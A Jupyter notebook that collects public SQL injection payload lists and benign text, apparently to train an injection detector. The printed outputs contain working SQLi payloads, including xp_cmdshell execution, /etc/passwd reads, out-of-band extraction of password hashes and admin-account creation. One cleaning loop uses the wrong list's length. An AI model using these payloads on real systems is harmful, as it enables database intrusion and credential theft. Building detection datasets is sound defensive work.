In [1]:
import keras

Using TensorFlow backend.

In [2]:
import nltk
import pandas as pd
import os

### File_name: git_foospidy_payloads_fuzzing_code_db_sqli.txt
##### Comments :  
1. removed \n at the end of each line
2.  replaced %20 by space
#### Source: https://github.com/foospidy/payloads/tree/master/other/sqli

In [50]:
path='./data/collection/git_foospidy_payloads_fuzzing_code_db_sqli.txt'

In [51]:
sql_lines_fuzzing=[]
f = open(path, "r")
for x in f:
    sql_lines_fuzzing.append(x)

In [52]:
sql_lines_fuzzing[:5]

["'sqlvuln\n", "'+sqlvuln\n", 'sqlvuln;\n', '(sqlvuln)\n', "a' or 1=1--\n"]

In [92]:
for i in range(len(sql_lines_fuzzing)):
    sql_lines_fuzzing[i]=sql_lines_fuzzing[i].replace('\n', '')
    sql_lines_fuzzing[i]=sql_lines_fuzzing[i].replace('%20', ' ')
    sql_lines_fuzzing[i]=sql_lines_fuzzing[i].replace('=', ' = ')
    sql_lines_fuzzing[i]=sql_lines_fuzzing[i].replace('((', ' (( ')
    sql_lines_fuzzing[i]=sql_lines_fuzzing[i].replace('))', ' )) ')
    sql_lines_fuzzing[i]=sql_lines_fuzzing[i].replace('(', ' ( ')
    sql_lines_fuzzing[i]=sql_lines_fuzzing[i].replace(')', ' ) ')

In [93]:
sql_lines_fuzzing[:45]

["'sqlvuln",
 "'+sqlvuln",
 'sqlvuln;',
 ' ( sqlvuln ) ',
 "a' or 1  =  1--",
 '"a"" or 1  =  1--"',
 ' or a   =   a',
 "a' or 'a'   =   'a",
 '1 or 1  =  1',
 "a' waitfor delay '0:0:10'--",
 "1 waitfor delay '0:0:10'--",
 'declare @q nvarchar  ( 4000 )  select @q   =  ',
 '0x770061006900740066006F0072002000640065006C00610079002000270030003A0030003A',
 '0',
 '031003000270000',
 'declare @s varchar ( 22 )  select @s   =  ',
 '0x77616974666F722064656C61792027303A303A31302700 exec ( @s ) ',
 '0x730065006c00650063007400200040004000760065007200730069006f006e00 exec ( @q ) ',
 'declare @s varchar  ( 8000 )  select @s   =   0x73656c65637420404076657273696f6e',
 'exec ( @s ) ',
 "a'",
 '?',
 "' or 1  =  1",
 '‘ or 1  =  1 --',
 "x' AND userid IS NULL; --",
 "x' AND email IS NULL; --",
 "anything' OR 'x'  =  'x",
 "x' AND 1  =   ( SELECT COUNT ( * )  FROM tabname ) ; --",
 "x' AND members.email IS NULL; --",
 "x' OR full_name LIKE '%Bob%",
 '23 OR 1  =  1',
 "'; exec master..xp_cmdshell 'ping 172.10.1.255'--",
 "'",
 "' or ''  =  '",
 "' or 'x'  =  'x",
 ' or x  =  x',
 "' )  or  ( 'x'  =  'x",
 '0 or 1  =  1',
 "' or 0  =  0 --",
 '" or 0  =  0 --',
 'or 0  =  0 --',
 "' or 0  =  0 #",
 ' or 0  =  0 #"',
 'or 0  =  0 #',
 "' or 1  =  1--"]

### File_Name: git_foospidy_payloads_other_sqli_camoufl4g3.txt
##### Comments : ok
#### Source: https://github.com/foospidy/payloads/tree/master/other/sqli

In [6]:
path='./data/collection/git_foospidy_payloads_other_sqli_camoufl4g3.txt'

In [7]:
sql_lines_camoufl4g3=[]
f = open(path, "r")
for x in f:
    sql_lines_camoufl4g3.append(x)

In [55]:
sql_lines_camoufl4g3[:15]

["'-'\n",
 "' '\n",
 "'&'\n",
 "'^'\n",
 "'*'\n",
 "' or ''-'\n",
 "' or '' '\n",
 "' or ''&'\n",
 "' or ''^'\n",
 "' or ''*'\n",
 '"-"\n',
 '" "\n',
 '"&"\n',
 '"^"\n',
 '"*"\n']

In [94]:
for i in range(len(sql_lines_camoufl4g3)):
    sql_lines_camoufl4g3[i]=sql_lines_camoufl4g3[i].replace('\n', '')
    sql_lines_camoufl4g3[i]=sql_lines_camoufl4g3[i].replace('%20', ' ')
    sql_lines_camoufl4g3[i]=sql_lines_camoufl4g3[i].replace('=', ' = ')
    sql_lines_camoufl4g3[i]=sql_lines_camoufl4g3[i].replace('((', ' (( ')
    sql_lines_camoufl4g3[i]=sql_lines_camoufl4g3[i].replace('))', ' )) ')
    sql_lines_camoufl4g3[i]=sql_lines_camoufl4g3[i].replace('(', ' ( ')
    sql_lines_camoufl4g3[i]=sql_lines_camoufl4g3[i].replace(')', ' ) ')

In [95]:
sql_lines_camoufl4g3[:15]

["'-'",
 "' '",
 "'&'",
 "'^'",
 "'*'",
 "' or ''-'",
 "' or '' '",
 "' or ''&'",
 "' or ''^'",
 "' or ''*'",
 '"-"',
 '" "',
 '"&"',
 '"^"',
 '"*"']

### File_Name: git_foospidy_payloads_other_sqli_libinjection-bypasses.txt
##### Comments: Should Remove &()o1: from start of each sentence
#### Source: https://github.com/foospidy/payloads/tree/master/other/sqli

In [68]:
path='./data/collection/git_foospidy_payloads_other_sqli_libinjection-bypasses.txt'

In [69]:
sql_lines_bypasses=[]
f = open(path, "r")
for x in f:
    sql_lines_bypasses.append(x)

In [71]:
sql_lines_bypasses[:5]

['&()o1: select * from users where id=1 or (\\)=1 union select 1,@@VERSION -- 1\n',
 '&(.)o: select * from users where id=1 or (\\.)=1 union select 1,@@VERSION -- 1\n',
 '&(1&1: select * from users where id=1 or (\\+)=1 or 1=1 -- 1\n',
 '&(1)o: select * from users where id=1 or (1)=1 union select 1,banner from v$version where rownum=1 -- 1\n',
 '&(1UE: select * from users where id=1 or (\\+)=1 union select 1,@@VERSION -- 1\n']

In [96]:
for i in range(len(sql_lines_camoufl4g3)):
    sql_lines_bypasses[i]=sql_lines_bypasses[i].replace('\n', '')
    sql_lines_bypasses[i]=sql_lines_bypasses[i].replace('%20', ' ')
    sql_lines_bypasses[i]=sql_lines_bypasses[i].replace('=', ' = ')
    sql_lines_bypasses[i]=sql_lines_bypasses[i].replace('((', ' (( ')
    sql_lines_bypasses[i]=sql_lines_bypasses[i].replace('))', ' )) ')
    sql_lines_bypasses[i]=sql_lines_bypasses[i].replace('(', ' ( ')
    sql_lines_bypasses[i]=sql_lines_bypasses[i].replace(')', ' ) ')

In [97]:
sql_lines_bypasses[:5]

['& (  ) o1: select * from users where id   =   1 or  ( \\ )    =   1 union select 1,@@VERSION -- 1',
 '& ( . ) o: select * from users where id   =   1 or  ( \\. )    =   1 union select 1,@@VERSION -- 1',
 '& ( 1&1: select * from users where id   =   1 or  ( \\+ )    =   1 or 1   =   1 -- 1',
 '& ( 1 ) o: select * from users where id   =   1 or  ( 1 )    =   1 union select 1,banner from v$version where rownum   =   1 -- 1',
 '& ( 1UE: select * from users where id   =   1 or  ( \\+ )    =   1 union select 1,@@VERSION -- 1']

In [98]:
# if don't want &(*)* sign in beginning of each sentence then run next code else don't
sql_lines_parsed=[]
for i in range(len(sql_lines_bypasses)):
    sentence=sql_lines_bypasses[i]
    sentence=sentence.split(':')[1]
    sql_lines_parsed.append(sentence)

In [99]:
sql_lines_parsed[:5]

[' select * from users where id   =   1 or  ( \\ )    =   1 union select 1,@@VERSION -- 1',
 ' select * from users where id   =   1 or  ( \\. )    =   1 union select 1,@@VERSION -- 1',
 ' select * from users where id   =   1 or  ( \\+ )    =   1 or 1   =   1 -- 1',
 ' select * from users where id   =   1 or  ( 1 )    =   1 union select 1,banner from v$version where rownum   =   1 -- 1',
 ' select * from users where id   =   1 or  ( \\+ )    =   1 union select 1,@@VERSION -- 1']

### File_Name: git_foospidy_payloads_owasp_sqli.txt
##### Comments: ok
#### Source: https://github.com/foospidy/payloads/tree/master/other/sqli

In [14]:
path='./data/collection/git_foospidy_payloads_owasp_sqli.txt'

In [15]:
sql_lines_owasp=[]
f = open(path, "r")
for x in f:
    sql_lines_owasp.append(x)

In [86]:
sql_lines_owasp[0:15]

['a\n',
 "a' \n",
 "a' --\n",
 "a' or 1=1; --\n",
 '@\n',
 '?\n',
 "' and 1=0) union all\n",
 '? or 1=1 --\n',
 "x' and userid is NULL; --\n",
 "x' and email is NULL; --\n",
 "anything' or 'x'='x\n",
 "x' and 1=(select count(*) from tabname); --\n",
 "x' and members.email is NULL; --\n",
 "x' or full_name like '%bob%\n",
 '23 or 1=1; --\n']

In [87]:
for i in range(len(sql_lines_owasp)):
    sql_lines_owasp[i]=sql_lines_owasp[i].replace('\n', '')
    sql_lines_owasp[i]=sql_lines_owasp[i].replace('%20', ' ')
    sql_lines_owasp[i]=sql_lines_owasp[i].replace('=', ' = ')
    sql_lines_owasp[i]=sql_lines_owasp[i].replace('((', ' (( ')
    sql_lines_owasp[i]=sql_lines_owasp[i].replace('))', ' )) ')
    sql_lines_owasp[i]=sql_lines_owasp[i].replace('(', ' ( ')
    sql_lines_owasp[i]=sql_lines_owasp[i].replace(')', ' ) ')

In [88]:
sql_lines_owasp[:15]

['a',
 "a' ",
 "a' --",
 "a' or 1 = 1; --",
 '@',
 '?',
 "' and 1 = 0 )  union all",
 '? or 1 = 1 --',
 "x' and userid is NULL; --",
 "x' and email is NULL; --",
 "anything' or 'x' = 'x",
 "x' and 1 =  ( select count ( * )  from tabname ) ; --",
 "x' and members.email is NULL; --",
 "x' or full_name like '%bob%",
 '23 or 1 = 1; --']

### File_Name: git_seclist_fuzzing_sqli_Generic-SQLi.txt
##### comments: should we remove %20 by spaces because %20 equals to space
#### Source: https://github.com/danielmiessler/SecLists/tree/master/Fuzzing/SQLi

In [17]:
path='./data/collection/git_seclist_fuzzing_sqli_Generic-SQLi.txt'

In [18]:
sql_lines_Generic=[]
f = open(path, "r")
for x in f:
    sql_lines_Generic.append(x)

In [19]:
sql_lines_Generic[:15]

[")%20or%20('x'='x\n",
 '%20or%201=1\n',
 "; execute immediate 'sel' || 'ect us' || 'er'\n",
 'benchmark(10000000,MD5(1))#\n',
 'update\n',
 '";waitfor delay \'0:0:__TIME__\'--\n',
 '1) or pg_sleep(__TIME__)--\n',
 '||(elt(-3+5,bin(15),ord(10),hex(char(45))))\n',
 '"hi"") or (""a""=""a"\n',
 'delete\n',
 'like\n',
 '" or sleep(__TIME__)#\n',
 'pg_sleep(__TIME__)--\n',
 '*(|(objectclass=*))\n',
 'declare @q nvarchar (200) 0x730065006c00650063 ...\n']

In [89]:
for i in range(len(sql_lines_Generic)):
    sql_lines_Generic[i]=sql_lines_Generic[i].replace('\n', '')
    sql_lines_Generic[i]=sql_lines_Generic[i].replace('%20', ' ')
    sql_lines_Generic[i]=sql_lines_Generic[i].replace('=', ' = ')
    sql_lines_Generic[i]=sql_lines_Generic[i].replace('((', ' (( ')
    sql_lines_Generic[i]=sql_lines_Generic[i].replace('))', ' )) ')
    sql_lines_Generic[i]=sql_lines_Generic[i].replace('(', ' ( ')
    sql_lines_Generic[i]=sql_lines_Generic[i].replace(')', ' ) ')

In [91]:
sql_lines_Generic[:15]

[" )  or  ( 'x' = 'x",
 ' or 1 = 1',
 "; execute immediate 'sel' || 'ect us' || 'er'",
 'benchmark ( 10000000,MD5 ( 1  )  )  #',
 'update',
 '";waitfor delay \'0:0:__TIME__\'--',
 '1 )  or pg_sleep ( __TIME__ ) --',
 '|| ( elt ( -3+5,bin ( 15 ) ,ord ( 10 ) ,hex ( char ( 45  )  )    )  )  ',
 '"hi"" )  or  ( ""a"" = ""a"',
 'delete',
 'like',
 '" or sleep ( __TIME__ ) #',
 'pg_sleep ( __TIME__ ) --',
 '* ( | ( objectclass = *  )  )  ',
 'declare @q nvarchar  ( 200 )  0x730065006c00650063 ...']

### File_name: scottparker_ml_sqli_src__trainingdata_plain.txt
##### Comments: Should I remove data containing urls
#### Source: https://github.com/tungpv98/Detect-Sql-Injection-by-Machine-Learning/tree/ebeb3287931677a3a42f11a7a08dbc13e374ff05/Sql-Injection/source/trainingdata

In [20]:
path='./data/collection/'
file="scottparker_ml_sqli_src__trainingdata_plain.txt"

In [21]:
df = pd.read_csv(os.path.join(path,file), sep='Aw3s0meSc0t7', names=['benign'], header=None, engine='python')

In [22]:
df.head()

                                         benign
0                           Add plain text here
1                      Ne te quaesiveris extra.
2    Man is his own star; and the soul that can
3           Render an honest and a perfect man,
4  Commands all light, all influence, all fate;

In [23]:
df['benign'][3693]

'comment6, http://www.thejustincredible.com/queer/pdf-14218-236-the_walker_bedtime_book.html The Walker Bedtime Book,  gryvhg, http://www.millymillz.com/fat-acceptance/pdf-14077-374-look_back_in_anger.html Look Back in Anger,  05830, http://www.nicholasfrance.com/humanities/pdf-14281-148-mirror_image.html Mirror Image,  >:-OO, http://www.thejustincredible.com/historical-fiction/pdf-14312-117-seeing_the_invisible_pb_champions_of_the_faith_.html SEEING THE INVISIBLE PB (Champions of the faith),  >:-D, http://www.warintheheavens.com/italian-literature/pdf-14354-67-praying_to_get_results.html Praying to Get Results,  obtlvd, http://www.michelleandnaf.com/feminist-studies/pdf-13931-334-the_divine_pity.html The Divine Pity'

Statistics

In [24]:
print("Benign records: %2i" %len(df))

Benign records: 3694

In [25]:
print(f"SQL fuzzing : {len(sql_lines_fuzzing)}  camoufl4gs : {len(sql_lines_camoufl4g3)} parsed : {len(sql_lines_parsed)} owasp : {len(sql_lines_owasp)} generic : {len(sql_lines_Generic)} \n total sql injection data : {len(sql_lines_Generic)+len(sql_lines_owasp)+len(sql_lines_parsed)+len(sql_lines_camoufl4g3)+len(sql_lines_fuzzing)} ")

SQL fuzzing : 142  camoufl4gs : 77 parsed : 474 owasp : 167 generic : 268
 total sql injection data : 1128

#### combination

In [26]:
all_sqli_sentence=sql_lines_owasp+sql_lines_parsed+sql_lines_camoufl4g3+sql_lines_fuzzing+sql_lines_Generic

In [27]:
len(all_sqli_sentence)

1128

In [28]:
from sklearn.feature_extraction.text import TfidfVectorizer

In [29]:
vectorizer = TfidfVectorizer()
X = vectorizer.fit_transform(all_sqli_sentence)

In [30]:
X

<1128x271 sparse matrix of type '<class 'numpy.float64'>'
	with 5113 stored elements in Compressed Sparse Row format>

In [31]:
X=df['benign'].values

In [32]:
vectorizer = TfidfVectorizer()
X = vectorizer.fit_transform(X)

In [33]:
X

<3694x10402 sparse matrix of type '<class 'numpy.float64'>'
	with 56418 stored elements in Compressed Sparse Row format>

In [34]:
X[0]

<1x10402 sparse matrix of type '<class 'numpy.float64'>'
	with 4 stored elements in Compressed Sparse Row format>

In [35]:
all_sqli_data=''
for i in all_sqli_sentence:
    all_sqli_data+= " " + i

In [36]:
all_sqli_data.replace('\n', ' ')

' a  a\'   a\' --  a\' or 1=1; --  @  ?  \' and 1=0) union all  ? or 1=1 --  x\' and userid is NULL; --  x\' and email is NULL; --  anything\' or \'x\'=\'x  x\' and 1=(select count(*) from tabname); --  x\' and members.email is NULL; --  x\' or full_name like \'%bob%  23 or 1=1; --  \'; exec master..xp_cmdshell \'ping 172.10.1.255\'--  a  1 or 1=1  1\' or \'1\'=\'1  1 and user_name() = \'dbo\'  1  1\'1  1 exec sp_ (or exec xp_)  1 and 1=1  1\' and 1=(select count(*) from tablenames); --  1  1 and user_name() = \'dbo\'  \\\'; desc users; --  1\\\'1  1\' and non_existant_table = \'1  \' or username is not NULL or username = \'  1 and ascii(lower(substring((select top 1 name from sysobjects where xtype=\'u\'), 1, 1))) > 116  1 union all select 1,2,3,4,5,6,name from sysobjects where xtype = \'u\' --  1 uni/**/on select all from where  ’ or ‘1’=’1  \' or \'1\'=\'1  \'||utl_http.request(\'httP://192.168.1.1/\')||\'  \' || myappadmin.adduser(\'admin\', \'newpass\') || \'  \' AND 1=utl_inaddr.get_host_address((SELECT banner FROM v$version WHERE ROWNUM=1)) AND \'i\'=\'i  \' AND 1=utl_inaddr.get_host_address((SELECT SYS.LOGIN_USER FROM DUAL)) AND \'i\'=\'i  \' AND 1=utl_inaddr.get_host_address((SELECT SYS.DATABASE_NAME FROM DUAL)) AND \'i\'=\'i  \' AND 1=utl_inaddr.get_host_address((SELECT host_name FROM v$instance)) AND \'i\'=\'i  \' AND 1=utl_inaddr.get_host_address((SELECT global_name FROM global_name)) AND \'i\'=\'i  \' AND 1=utl_inaddr.get_host_address((SELECT COUNT(DISTINCT(USERNAME)) FROM SYS.ALL_USERS)) AND \'i\'=\'i  \' AND 1=utl_inaddr.get_host_address((SELECT COUNT(DISTINCT(PASSWORD)) FROM SYS.USER$)) AND \'i\'=\'i  \' AND 1=utl_inaddr.get_host_address((SELECT COUNT(DISTINCT(table_name)) FROM sys.all_tables)) AND \'i\'=\'i  \' AND 1=utl_inaddr.get_host_address((SELECT COUNT(DISTINCT(column_name)) FROM sys.all_tab_columns)) AND \'i\'=\'i  \' AND 1=utl_inaddr.get_host_address((SELECT COUNT(DISTINCT(GRANTED_ROLE)) FROM DBA_ROLE_PRIVS WHERE GRANTEE=SYS.LOGIN_USER)) AND \'i\'=\'i  \' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(USERNAME) FROM (SELECT DISTINCT(USERNAME), ROWNUM AS LIMIT FROM SYS.ALL_USERS) WHERE LIMIT=1)) AND \'i\'=\'i  \' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(PASSWORD) FROM (SELECT DISTINCT(PASSWORD), ROWNUM AS LIMIT FROM SYS.USER$) WHERE LIMIT=1)) AND \'i\'=\'i  \' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(table_name) FROM (SELECT DISTINCT(table_name), ROWNUM AS LIMIT FROM sys.all_tables) WHERE LIMIT=1)) AND \'i\'=\'i  \' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(column_name) FROM (SELECT DISTINCT(column_name), ROWNUM AS LIMIT FROM all_tab_columns) WHERE LIMIT=1)) AND \'i\'=\'i  \' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(granted_role) FROM (SELECT DISTINCT(granted_role), ROWNUM AS LIMIT FROM dba_role_privs WHERE GRANTEE=SYS.LOGINUSER) WHERE LIMIT=1)) AND \'i\'=\'i  \' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(USERNAME) FROM (SELECT DISTINCT(USERNAME), ROWNUM AS LIMIT FROM SYS.ALL_USERS) WHERE LIMIT=2)) AND \'i\'=\'i  \' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(PASSWORD) FROM (SELECT DISTINCT(PASSWORD), ROWNUM AS LIMIT FROM SYS.USER$) WHERE LIMIT=2)) AND \'i\'=\'i  \' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(table_name) FROM (SELECT DISTINCT(table_name), ROWNUM AS LIMIT FROM sys.all_tables) WHERE LIMIT=2)) AND \'i\'=\'i  \' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(column_name) FROM (SELECT DISTINCT(column_name), ROWNUM AS LIMIT FROM all_tab_columns) WHERE LIMIT=2)) AND \'i\'=\'i  \' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(granted_role) FROM (SELECT DISTINCT(granted_role), ROWNUM AS LIMIT FROM dba_role_privs WHERE GRANTEE=SYS.LOGINUSER) WHERE LIMIT=2)) AND \'i\'=\'i  \' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(USERNAME) FROM (SELECT DISTINCT(USERNAME), ROWNUM AS LIMIT FROM SYS.ALL_USERS) WHERE LIMIT=3)) AND \'i\'=\'i  \' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(PASSWORD) FROM (SELECT DISTINCT(PASSWORD), ROWNUM AS LIMIT FROM SYS.USER$) WHERE LIMIT=3)) AND \'i\'=\'i  \' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(table_name) FROM (SELECT DISTINCT(table_name), ROWNUM AS LIMIT FROM sys.all_tables) WHERE LIMIT=3)) AND \'i\'=\'i  \' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(column_name) FROM (SELECT DISTINCT(column_name), ROWNUM AS LIMIT FROM all_tab_columns) WHERE LIMIT=3)) AND \'i\'=\'i  \' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(granted_role) FROM (SELECT DISTINCT(granted_role), ROWNUM AS LIMIT FROM dba_role_privs WHERE GRANTEE=SYS.LOGINUSER) WHERE LIMIT=3)) AND \'i\'=\'i  \' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(USERNAME) FROM (SELECT DISTINCT(USERNAME), ROWNUM AS LIMIT FROM SYS.ALL_USERS) WHERE LIMIT=4)) AND \'i\'=\'i  \' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(PASSWORD) FROM (SELECT DISTINCT(PASSWORD), ROWNUM AS LIMIT FROM SYS.USER$) WHERE LIMIT=4)) AND \'i\'=\'i  \' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(table_name) FROM (SELECT DISTINCT(table_name), ROWNUM AS LIMIT FROM sys.all_tables) WHERE LIMIT=4)) AND \'i\'=\'i  \' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(column_name) FROM (SELECT DISTINCT(column_name), ROWNUM AS LIMIT FROM all_tab_columns) WHERE LIMIT=4)) AND \'i\'=\'i  \' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(granted_role) FROM (SELECT DISTINCT(granted_role), ROWNUM AS LIMIT FROM dba_role_privs WHERE GRANTEE=SYS.LOGINUSER) WHERE LIMIT=4)) AND \'i\'=\'i  \' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(USERNAME) FROM (SELECT DISTINCT(USERNAME), ROWNUM AS LIMIT FROM SYS.ALL_USERS) WHERE LIMIT=5)) AND \'i\'=\'i  \' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(PASSWORD) FROM (SELECT DISTINCT(PASSWORD), ROWNUM AS LIMIT FROM SYS.USER$) WHERE LIMIT=5)) AND \'i\'=\'i  \' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(table_name) FROM (SELECT DISTINCT(table_name), ROWNUM AS LIMIT FROM sys.all_tables) WHERE LIMIT=5)) AND \'i\'=\'i  \' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(column_name) FROM (SELECT DISTINCT(column_name), ROWNUM AS LIMIT FROM all_tab_columns) WHERE LIMIT=5)) AND \'i\'=\'i  \' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(granted_role) FROM (SELECT DISTINCT(granted_role), ROWNUM AS LIMIT FROM dba_role_privs WHERE GRANTEE=SYS.LOGINUSER) WHERE LIMIT=5)) AND \'i\'=\'i  \' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(USERNAME) FROM (SELECT DISTINCT(USERNAME), ROWNUM AS LIMIT FROM SYS.ALL_USERS) WHERE LIMIT=6)) AND \'i\'=\'i  \' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(PASSWORD) FROM (SELECT DISTINCT(PASSWORD), ROWNUM AS LIMIT FROM SYS.USER$) WHERE LIMIT=6)) AND \'i\'=\'i  \' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(table_name) FROM (SELECT DISTINCT(table_name), ROWNUM AS LIMIT FROM sys.all_tables) WHERE LIMIT=6)) AND \'i\'=\'i  \' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(column_name) FROM (SELECT DISTINCT(column_name), ROWNUM AS LIMIT FROM all_tab_columns) WHERE LIMIT=6)) AND \'i\'=\'i  \' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(granted_role) FROM (SELECT DISTINCT(granted_role), ROWNUM AS LIMIT FROM dba_role_privs WHERE GRANTEE=SYS.LOGINUSER) WHERE LIMIT=6)) AND \'i\'=\'i  \' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(USERNAME) FROM (SELECT DISTINCT(USERNAME), ROWNUM AS LIMIT FROM SYS.ALL_USERS) WHERE LIMIT=7)) AND \'i\'=\'i  \' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(PASSWORD) FROM (SELECT DISTINCT(PASSWORD), ROWNUM AS LIMIT FROM SYS.USER$) WHERE LIMIT=7)) AND \'i\'=\'i  \' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(table_name) FROM (SELECT DISTINCT(table_name), ROWNUM AS LIMIT FROM sys.all_tables) WHERE LIMIT=7)) AND \'i\'=\'i  \' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(column_name) FROM (SELECT DISTINCT(column_name), ROWNUM AS LIMIT FROM all_tab_columns) WHERE LIMIT=7)) AND \'i\'=\'i  \' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(granted_role) FROM (SELECT DISTINCT(granted_role), ROWNUM AS LIMIT FROM dba_role_privs WHERE GRANTEE=SYS.LOGINUSER) WHERE LIMIT=7)) AND \'i\'=\'i  \' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(USERNAME) FROM (SELECT DISTINCT(USERNAME), ROWNUM AS LIMIT FROM SYS.ALL_USERS) WHERE LIMIT=8)) AND \'i\'=\'i  \' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(PASSWORD) FROM (SELECT DISTINCT(PASSWORD), ROWNUM AS LIMIT FROM SYS.USER$) WHERE LIMIT=8)) AND \'i\'=\'i  \' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(table_name) FROM (SELECT DISTINCT(table_name), ROWNUM AS LIMIT FROM sys.all_tables) WHERE LIMIT=8)) AND \'i\'=\'i  \' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(column_name) FROM (SELECT DISTINCT(column_name), ROWNUM AS LIMIT FROM all_tab_columns) WHERE LIMIT=8)) AND \'i\'=\'i  \' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(granted_role) FROM (SELECT DISTINCT(granted_role), ROWNUM AS LIMIT FROM dba_role_privs WHERE GRANTEE=SYS.LOGINUSER) WHERE LIMIT=8)) AND \'i\'=\'i  \'||(elt(-3+5,bin(15),ord(10),hex(char(45))))  ||6  \'||\'6  (||6)  \' or 1=1--   or 1=1  \' or \'1\'=\'1  ; or \'1\'=\'1\'  " or isNULL(1/0) /*  \' or \'7659\'=\'7659  " or isNULL(1/0) /*  \' --   \' or 1=1--  " or 1=1--  \' or 1=1 /*  or 1=1--  \' or \'a\'=\'a  " or "a"="a  \') or (\'a\'=\'a  admin\' or \'  \' select * from information_schema.tables--  ) union select * from information_schema.tables;  \' having 1=1--  \' having 1=1--  \' group by userid having 1=1--  \' select name from syscolumns where id = (select id from sysobjects where name = tablename\')--  \' or 1 in (select @@version)--  \' union all select @@version--  \' or \'unusual\' = \'unusual\'  \' or \'something\' = \'some\'+\'thing\'  \' or \'text\' = n\'text\'  \' or \'something\' like \'some%\'  \' or 2 > 1  \' or \'text\' > \'t\'  \' or \'whatever\' in (\'whatever\')  \' or 2 between 1 and 3  \' or username like char(37);  \' union select * from users where login = char(114,111,111,116);  \' union select   password:*/=1--  uni/**/on sel/**/ect  \'; execute immediate \'sel\' || \'ect us\' || \'er\'  \'; exec (\'sel\' + \'ect us\' + \'er\')  \'/**/or/**/1/**/=/**/1  \' or 1/*   or isNULL(1/0) /*  \' or \'7659\'=\'7659  " or isNULL(1/0) /*  \' -- &password=  \'; begin declare @var varchar(8000) set @var=\':\' select @var=@var+\'+login+\'/\'+password+\' \' from users where login >   @var select @var as var into temp end --  \' and 1 in (select var from temp)--  \' union select 1,load_file(\'/etc/passwd\'),1,1,1;  1;(load_file(char(47,101,116,99,47,112,97,115,115,119,100))),1,1,1;  \' and 1=( if((load_file(char(110,46,101,120,116))<>char(39,39)),1,0));  \'; exec master..xp_cmdshell \'ping 10.10.1.2\'--  create user name identified by \'pass123\'  create user name identified by pass123 temporary tablespace temp default tablespace users;   \' ; drop table temp --  exec sp_addlogin \'name\' , \'password\'  exec sp_addsrvrolemember \'name\' , \'sysadmin\'  insert into mysql.user (user, host, password) values (\'name\', \'localhost\', password(\'pass123\'))  grant connect to name; grant resource to name;  insert into users(login, password, level) values( char(0x70) + char(0x65) + char(0x74) + char(0x65) + char(0x72) + char(0x70) + char(0x65) + char(0x74) + char(0x65) + char(0x72),char(0x64)  \' or 1=1 --  \' union (select @@version) --  \' union (select NULL, (select @@version)) --  \' union (select NULL, NULL, (select @@version)) --  \' union (select NULL, NULL, NULL,  (select @@version)) --  \' union (select NULL, NULL, NULL, NULL,  (select @@version)) --  \' union (select NULL, NULL, NULL, NULL,  NULL, (select @@version)) --  \'; if not(substring((select @@version),25,1) <> 0) waitfor delay \'0:0:2\' --  \'; if not(substring((select @@version),25,1) <> 5) waitfor delay \'0:0:2\' --  \'; if not(substring((select @@version),25,1) <> 8) waitfor delay \'0:0:2\' --  \'; if not(substring((select @@version),24,1) <> 1) waitfor delay \'0:0:2\' --  \'; if not(select system_user) <> \'sa\' waitfor delay \'0:0:2\' --  \'; if is_srvrolemember(\'sysadmin\') > 0 waitfor delay \'0:0:2\' --   \'; if not((select serverproperty(\'isintegratedsecurityonly\')) <> 1) waitfor delay \'0:0:2\' --  \'; if not((select serverproperty(\'isintegratedsecurityonly\')) <> 0) waitfor delay \'0:0:2\' --  select * from users where id=1 or (\\)=1 union select 1,@@VERSION -- 1   select * from users where id=1 or (\\.)=1 union select 1,@@VERSION -- 1   select * from users where id=1 or (\\+)=1 or 1=1 -- 1   select * from users where id=1 or (1)=1 union select 1,banner from v$version where rownum=1 -- 1   select * from users where id=1 or (\\+)=1 union select 1,@@VERSION -- 1   select * from users where id=1 or ($+)=1 or 1=1 -- 1   select * from users where id=1 or ($+)=1 union select 1,@@VERSION -- 1   select * from users where id=1 or \\.<\\ or 1=1 -- 1   select * from users where id=1 or \\.<1 or 1=1 -- 1   select * from users where id=1 or \\.<1 union select 1,@@VERSION -- 1   select * from users where id=1 or \\.<\\ union select 1,@@VERSION -- 1   select * from users where id=1 or \\.<$ or 1=1 -- 1   select * from users where id=1 or \\.<$ union select 1,@@VERSION -- 1   select * from users where id=1 or \\.< =1 union select 1,@@VERSION -- 1   select * from users where id=1 ||1 union select 1,banner from v$version where rownum=1 -- 1   select * from users where id=1 ||1 union select null,banner from v$version where rownum=1 -- 1   select * from users where id=1   or 1=1 -- 1   select * from users where id=1 or \\+<\\ or 1=1 -- 1   select * from users where id=1 or  1<@=1 union select 